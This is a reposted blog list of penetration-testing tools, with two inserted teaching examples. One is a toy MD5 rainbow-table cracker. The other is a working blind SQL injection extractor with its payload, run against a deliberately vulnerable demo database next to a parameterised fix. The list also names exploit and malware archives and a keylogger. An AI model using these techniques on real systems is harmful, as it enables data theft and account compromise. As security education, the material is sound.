Penetration Testing Tools (compiled by a foreigner)


Packet Shaper:
Nemesis : a command line packet shaper
Packit : The Packet Toolkit - A network packet shaper.
Hping  by Antirez: a command line TCP/IP packet shaper
Sing : stands for 'Send ICMP Nasty Garbage'; sends fully customizable ICMP packets
Scapy : a new python-based packet generator


Password Cracker/Login Hacker:
John the Ripper : a well-known password cracker for Windows and *nix Systems
Djohn : a distributed password cracker based on John the Ripper
Cain & Abel : an advanced password recovery tool for Windows systems. It sniffs network packets and cracks the captured authentication data by brute force or with dictionary attacks.
Project RainbowCrack : Advanced instant NT password cracker
Rainbowtables : The Shmoo Group provides pre-generated rainbow tables for BitTorrent download. The tables are generated with RainbowCrack (see above).
Windows NT  password recovery tool  by Peter Nordahl
THC-Dialup Login Hacker  by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.
Hydra  by THC: a multi-protocol login hacker. Hydra is also integrated with  Nessus .
Medusa : parallel network login auditor
THC imap bruter : a very fast imap password brute forcer
x25bru : a login/password bruteforcer for X.25 PADs
Crowbar : a generic web brute force tool (Windows only; requires .NET Framework)
MDCrack-NG : a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables
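The time/memory trade-off behind RainbowCrack and the Shmoo tables listed above, as an added toy example (this is not code from any of the tools above; the keyspace, chain length, hash function and reduction function are chosen here for illustration). A rainbow table stores only the start and end of each hash/reduce chain; to crack a hash you walk from every possible column to an endpoint, and only when an endpoint matches do you regenerate that one chain and look for the preimage. The position-dependent reduction function is what distinguishes a rainbow table from the older Hellman tables: two chains that collide in different columns keep diverging instead of merging.

```python
import hashlib
import string
from typing import Dict, List, Optional

# Constructed toy parameters. A real table covers a far larger keyspace
# (e.g. all 7-character LM halves) with much longer chains.
CHARSET = string.ascii_lowercase
PW_LEN = 3
KEYSPACE = len(CHARSET) ** PW_LEN      # 17,576 candidate passwords
CHAIN_LEN = 20                         # hash/reduce steps per chain
NUM_CHAINS = 1500                      # (start, end) pairs kept on disk


def h(pw: str) -> str:
    """Unsalted MD5, the kind of hash a precomputed table pays off against."""
    return hashlib.md5(pw.encode()).hexdigest()


def index_to_pw(n: int) -> str:
    """Map an integer in [0, KEYSPACE) to a password in the keyspace."""
    out = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(CHARSET))
        out.append(CHARSET[r])
    return "".join(out)


def reduce_fn(digest: str, column: int) -> str:
    """Map a digest back into the keyspace; the column index is mixed in so
    chains colliding at different columns do not merge."""
    n = (int(digest[:12], 16) + column * 0x9E3779B1) % KEYSPACE
    return index_to_pw(n)


def build_table() -> Dict[str, List[str]]:
    """Precompute chains; only endpoint -> [start points] is stored."""
    table: Dict[str, List[str]] = {}
    for c in range(NUM_CHAINS):
        start = index_to_pw((c * 7919) % KEYSPACE)  # deterministic start points
        pw = start
        for column in range(CHAIN_LEN):
            pw = reduce_fn(h(pw), column)
        table.setdefault(pw, []).append(start)      # endpoints may collide
    return table


def crack(table: Dict[str, List[str]], target: str) -> Optional[str]:
    """Recover a preimage of `target` from the table, or None if not covered."""
    for column in range(CHAIN_LEN - 1, -1, -1):
        # Hypothesis: the target sits in this column. Walk to the endpoint.
        pw = reduce_fn(target, column)
        for later in range(column + 1, CHAIN_LEN):
            pw = reduce_fn(h(pw), later)
        for start in table.get(pw, []):
            # Endpoint matched: regenerate that chain and test each hash.
            # A false alarm (endpoint collision) simply fails this check.
            cand = start
            for col in range(CHAIN_LEN):
                if h(cand) == target:
                    return cand
                cand = reduce_fn(h(cand), col)
    return None


if __name__ == "__main__":
    table = build_table()
    print("chains stored:", sum(len(v) for v in table.values()))
    for pw in ("aaa", reduce_fn(h("aaa"), 0), "zzz"):
        print(pw, "->", crack(table, h(pw)))
```

Coverage is probabilistic: a password is found only if it occurs somewhere in a stored chain, which is why the generated tables quote a success rate rather than a guarantee, and why a per-account salt (which multiplies the keyspace by the number of possible salts) defeats the approach entirely.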
Advanced Sniffers:
Wireshark  (formerly known as Ethereal): an open source network protocol analyzer
Dsniff  by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools
Ettercap : a multipurpose sniffer/interceptor/logger for switched LAN environments
aimsniffer : monitors AOL Instant Messenger communication on the network
4G8 : a tool, similar to Ettercap, to capture network traffic in switched environments
cdpsniffer : Cisco discovery protocol (CDP) decoding sniffer
Port Scanner / Information Gathering:
nmap : the currently most well-known port scanner. Since version 3.45 it supports  version scans . Have a look at  PBNJ  for diffing different nmap scans.
ISECOM  released their nmap wrapper  NWRAP , which shows all known protocols for the discovered ports from the Open Protocol Resource Database
Nmap::Scanner : Perl output parser for nmap
Amap  by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.
vmap  by THC: version mapper to determine the version (sic!) of scanned daemons
Unicornscan : an information gathering and correlation engine
DMitry  (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems
Athena : a search engine query tool for passive information gathering
Security Scanner:
Nessus : version 2 is an open-source network scanner. Version 3 is only available in binary form and under a proprietary license.
OpenVAS : a fork of Nessus 2.2.5 (formerly known as GNessUs)
Nessj: a java based  nessus  (and compatibles) client (formerly known as Reason)
Paul Clip from @stake released  AUSTIN , a security scanner for Palm OS 3.5+.
Webserver:
Nikto : a web server scanner with anti-IDS features. Based on Rain Forest Puppy's  libwhisker  library.
Wikto : a webserver assessment tool (Windows only; requires .NET framework)
WSDigger : a black box web pen testing tool from Foundstone (Windows based)
Metis : a java based information gathering tool for web sites
Fingerprinting:
SinFP : a fingerprinting tool which requires only one open TCP port and sends at most 3 packets
Winfingerprint : much more than a simple fingerprinting tool. It scans for Windows shares, enumerates usernames, groups, SIDs and much more.
p0f 2 : Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a complete rewrite of the old p0f code.
xprobe2 : a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team
Cron-OS : an active OS fingerprinting tool based on TCP timeout behavior. This project was formerly known as “RING” and is now published as a nmap addon.
Proxy Server:
Burp proxy : an interactive HTTP/S proxy server for attacking and debugging web-enabled applications
Screen-scraper : a http/https-proxy server with a scripting engine for data manipulation and searching
Paros : a man-in-the-middle proxy and application vulnerability scanner
WebScarab : a framework for analyzing web applications. One of its basic functions is use as an intercepting proxy.
War Dialers:
IWar : a classic war dialer,  now also with VOIP (IAX2) support. One of a few wardialers for *nix operating systems, and the only one with VOIP functionality (to my knowledge)
THC-Scan: a war dialer for DOS, Windows and DOS emulators

Malware / Exploit Collections:
packetstormsecurity.org : Huge collections of tools and exploits
ElseNot Project : The project tries to publish an exploit for each MS Security Bulletin. A script kiddie dream come true.
Offensive Computing : Another malware collection site
Securityforest : try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff
Databases / SQL:
sqlninja : a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)
CIS Oracle Database Scoring Tool : scans Oracle 8i for compliance with the CIS Oracle Database Benchmark
SQLRecon : an active and passive scanner for MSSQL server. Works on Windows 2000, XP and 2003.
absinthe : a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see  here  and  here ).
SQL Power Injector : a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)
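What absinthe automates, boolean-based blind SQL injection, as an added worked example against a constructed in-memory SQLite database (this is not code from absinthe or sqlninja, whose targets are real web applications and MS SQL Server; the table, the row data and the `alice` account used to hijack the query are assumptions). The vulnerable lookup leaks a single bit per request (row found or not); the extractor turns that into a binary search over each character and, beside it, the parameterised version shows the same payload doing nothing.

```python
import sqlite3
from typing import Callable


def make_demo_db() -> sqlite3.Connection:
    """Constructed demo data standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 's3cr3t')")
    conn.commit()
    return conn


def vulnerable_user_exists(conn: sqlite3.Connection, name: str) -> bool:
    """Deliberately vulnerable: input is concatenated into the SQL string.
    The caller learns only whether a row came back, the one-bit oracle a
    blind injection tool works with."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def hardened_user_exists(conn: sqlite3.Connection, name: str) -> bool:
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = "SELECT id FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


class BlindExtractor:
    """Recovers the value of any SQL expression through a true/false oracle."""

    def __init__(self, ask: Callable[[str], bool]):
        self.ask = ask        # the application's lookup, called with attacker input
        self.requests = 0     # cost of the attack in oracle queries

    def _true(self, condition: str) -> bool:
        # Close the string with a known-good name so the row exists iff
        # `condition` holds; '-- ' comments out the application's closing quote.
        self.requests += 1
        return self.ask(f"alice' AND ({condition}) -- ")

    def extract(self, expr: str, max_len: int = 64) -> str:
        length = None
        for n in range(max_len + 1):
            if self._true(f"length({expr}) = {n}"):
                length = n
                break
        if length is None:
            raise ValueError("value longer than max_len")
        chars = []
        for pos in range(1, length + 1):
            # Binary search the code point of one character (ASCII assumed).
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                if self._true(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            chars.append(chr(lo))
        return "".join(chars)


if __name__ == "__main__":
    db = make_demo_db()
    ex = BlindExtractor(lambda name: vulnerable_user_exists(db, name))
    print(ex.extract("(SELECT secret FROM users WHERE id = 1)"), "in", ex.requests, "requests")
    payload = "alice' AND (1=1) -- "
    print("vulnerable:", vulnerable_user_exists(db, payload),
          "hardened:", hardened_user_exists(db, payload))
```

Each character costs seven requests (a binary search over 128 code points) plus the length probe, which is why the real tools lean on time-based or error-based variants only when no boolean difference is visible, and why request-rate anomalies of this shape are worth alerting on from the web server log.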
Voice over IP (VOIP):
vomit  (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files
SiVuS : a VOIP vulnerability scanner - SIP protocol (beta, Windows only)
Cain & Abel : mostly a password cracker, can also record VOIP conversations (Windows only)
sipsak  (SIP swiss army knife): a SIP packet generator
SIPp : a SIP test tool and packet generator
Nastysip : a SIP bogus message generator
voipong : dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP
Perl based tools  by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules
rtptools : a toolset for rtp recording and playing
Networkbased Tools:
yersinia : a network tool designed to take advantage of weaknesses in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)
Netsed : alters content of network packets while forwarding the packets
ip6sic : an IPv6 stack integrity tester
VPN:
ike-scan : an IPSec enumeration and fingerprinting tool
ikeprobe : an IKE scanning tool
ipsectrace : a tool for profiling ipsec traffic in a dump file. Initial alpha release
VPNMonitor : a Java application to observe network traffic. It graphically represents network connections and highlights all VPN connections. Nice for demonstrations, if of somewhat limited use in a real pen test.
IKECrack :an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])
DNSA : DNS Auditing tool by Pierre Betouin
Hunt : a session hijacking tool with curses GUI
SMAC : a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.
The WebGoat Project : a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.
TSCrack : a Windows Terminal Server brute forcer
Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning ( NetScan MobilePenTester ). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake no longer seems to support many of its free security tools, so use the alternative download links above instead.
THC-FuzzyFingerprint : generates fuzzy fingerprints that look nearly identical to a given fingerprint/hash sum. Very useful for MITM attacks.
BeatLM , a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try  ScoopLM .
THC vlogger : a linux kernel based keylogger
The Metasploit Framework : an “advanced open-source platform for developing, testing, and using exploit code”.
ATK  (Attack Tool Kit): a combination of security scanner and exploit framework (Windows only)
Pirana : an exploitation framework to test the security of email content filters. See also the  whitepaper
PassLoc : a tool which provides the means to locate keys within a buffer. Based on the article “ Playing hide and seek with stored keys ” by Adi Shamir.
Dl-Hell : identifies the dynamic link library (DLL) files an executable depends on
DHCPing : a security tool for testing dhcp security
ldapenum : a perl script for enumeration against ldap servers.
Checkpwd : a dictionary based password checker for oracle databases
NirCmd from NirSoft : a windows command line tool to manipulate the registry, initiate a dialup connection and much more
Windows Permission Identifier : a tool for auditing user permissions on a Windows system
MSNPawn : a toolset for footprinting, profiling and assessment via MSN Search. Windows-only, .NET required
snmpcheck :a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.
pwdump6 : extract NTLM and LanMan hashes from Windows targets

There are also some wireless ones. I am using CentOS.

This article is reposted from sinojelly's 51CTO blog; original link: http://blog.51cto.com/pnig0s1992/338176. If you want to repost it, please contact the original author yourself.
